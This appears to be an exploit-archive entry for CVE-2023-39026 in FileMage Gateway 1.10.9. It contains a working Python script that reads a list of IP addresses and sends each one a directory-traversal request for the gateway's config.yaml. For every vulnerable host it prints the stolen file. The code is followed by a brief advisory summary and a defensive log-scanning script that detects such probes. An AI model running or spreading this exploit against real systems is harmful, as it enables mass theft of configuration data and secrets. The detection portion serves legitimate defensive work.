Headline
FileMage Gateway 1.10.9 Local File Inclusion
FileMage Gateway version 1.10.9 suffers from a local file inclusion vulnerability.
# Exploit Title: FileMage Gateway 1.10.9 - Local File Inclusion
# Date: 8/22/2023
# Exploit Author: Bryce "Raindayzz" Harty
# Vendor Homepage: https://www.filemage.io/
# Version: Azure Versions < 1.10.9
# Tested on: All Azure deployments < 1.10.9
# CVE : CVE-2023-39026
# Technical Blog - https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html
# Patch from vendor - https://www.filemage.io/docs/updates.html

import requests
import warnings

warnings.filterwarnings("ignore")

def worker(url):
    response = requests.get(url, verify=False, timeout=.5)
    return response

def main():
    listIP = []
    file_path = input("Enter the path to the file containing the IP addresses: ")
    with open(file_path, 'r') as file:
        ip_list = file.read().splitlines()
    searchString = "tls"
    for ip in ip_list:
        url = f"https://{ip}" + "/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cprogramdata%5cfilemage%5cgateway%5cconfig.yaml"
        try:
            response = worker(url)
            #print(response.text)
            if searchString in response.text:
                print("Vulnerable IP: " + ip)
                print(response.text)
                listIP.append(ip)
        except requests.exceptions.RequestException as e:
            print(f"Error occurred for {ip}: {str(e)}")
    for x in listIP:
        print(x)

if __name__ == '__main__':
    main()
Related news
CVE-2023-39026: FileMage Gateway LFI
Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.
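For defenders checking whether a gateway was probed, the sketch below is an added example (not part of the exploit or of any vendor tooling) that scans access logs for the encoded-backslash traversal described above. It assumes combined-format log lines, which are constructed here, and it keys on `..` path segments after decoding rather than on the path prefix, since the exploit requests `/mgmnt/` while the advisory names `/mgmt/`.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in combined log format (an assumption; adapt the
# regex to whatever your reverse proxy or gateway actually writes).
SAMPLE_LOG = """\
203.0.113.7 - - [22/Aug/2023:10:01:02 +0000] "GET /mgmnt/..%5c..%5c..%5cprogramdata%5cfilemage%5cgateway%5cconfig.yaml HTTP/1.1" 200 1834
203.0.113.7 - - [22/Aug/2023:10:01:05 +0000] "GET /mgmt/..%255c..%255cprogramdata%255cfilemage%255cgateway%255cconfig.yaml HTTP/1.1" 404 0
198.51.100.4 - - [22/Aug/2023:10:02:11 +0000] "GET /mgmt/login HTTP/1.1" 200 5120
198.51.100.4 - - [22/Aug/2023:10:02:30 +0000] "GET /files/report..v2.pdf HTTP/1.1" 200 88211
"""

LINE_RE = re.compile(r'^(\S+) .*?"(?:[A-Z]+) (\S+) HTTP/[\d.]+" (\d{3}) ')


def normalize(target, max_rounds=3):
    """Percent-decode repeatedly (catches double encoding) and unify separators."""
    path = target.split("?", 1)[0]
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/").lower()


def find_traversal(log_text):
    """Return (client, status, normalized_path, config_read) for suspicious requests."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        path = normalize(target)
        # Flag only whole ".." segments, so "report..v2.pdf" is not a hit.
        if ".." in path.split("/"):
            config_read = path.endswith("filemage/gateway/config.yaml") and status == "200"
            hits.append((client, int(status), path, config_read))
    return hits


if __name__ == "__main__":
    for client, status, path, config_read in find_traversal(SAMPLE_LOG):
        note = "config.yaml returned" if config_read else "probe"
        print(f"{client} {status} {path} [{note}]")
```

A hit with `config_read` set means the configuration file was served to that client, so its contents should be treated as disclosed.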